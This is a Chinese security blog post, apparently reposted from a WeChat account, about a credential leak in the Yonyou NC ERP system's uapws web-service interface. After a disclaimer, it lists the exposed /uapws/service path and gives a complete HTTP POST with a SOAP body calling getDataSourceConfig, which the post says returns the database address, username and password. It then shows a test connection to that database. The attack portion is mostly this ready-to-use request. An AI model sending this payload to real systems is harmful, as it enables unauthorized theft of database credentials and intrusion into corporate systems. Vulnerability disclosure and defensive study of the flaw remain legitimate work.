用友NC uapws接口信息泄露

admin 2022年10月29日17:00:38评论1,246 views字数 1235阅读4分7秒阅读模式
用友NC uapws接口信息泄露
    文章声明

安全技术类文章仅供参考,此文所提供的信息仅针对漏洞靶场进行渗透,未经授权请勿利用文章中的技术手段对任何计算机系统进行入侵操作。
本文所提供的工具仅用于学习,禁止用于其他目的,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全

一、漏洞描述

用友NC系统的uapws接口存在信息泄露,老版本会造成数据库账号和密码的泄露。

二、漏洞复现

访问系统首页显示如下

用友NC uapws接口信息泄露

漏洞利用点:接口泄露

/uapws/service

用友NC uapws接口信息泄露

以下面的接口为例

{http://inittool.ses.itf.nc/PortalSESInitToolService}PortalSESInitToolServicePort

用友NC uapws接口信息泄露

获取系统数据库账号密码的payload构造如下

POST /uapws/service/nc.itf.ses.inittool.PortalSESInitToolService HTTP/1.1Host: xx.xx.xx.xxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0Content-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: JSESSIONID=F573990B45D801F3EE70A4111CBEE04E.server; JSESSIONID=FCAD4099B81F7E7B67BCD2C1F80B63F6.serverUpgrade-Insecure-Requests: 1Pragma: no-cacheCache-Control: no-cacheContent-Length: 251
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:por="http://inittool.ses.itf.nc/PortalSESInitToolService"> <soapenv:Header/> <soapenv:Body> <por:getDataSourceConfig/> </soapenv:Body></soapenv:Envelope

在响应中可获取数据库地址、用户名和密码

用友NC uapws接口信息泄露

进行数据库连接测试

用友NC uapws接口信息泄露

原文始发于微信公众号(守卫者安全):用友NC uapws接口信息泄露

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年10月29日17:00:38
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   用友NC uapws接口信息泄露https://cn-sec.com/archives/1365356.html

发表评论

匿名网友 填写信息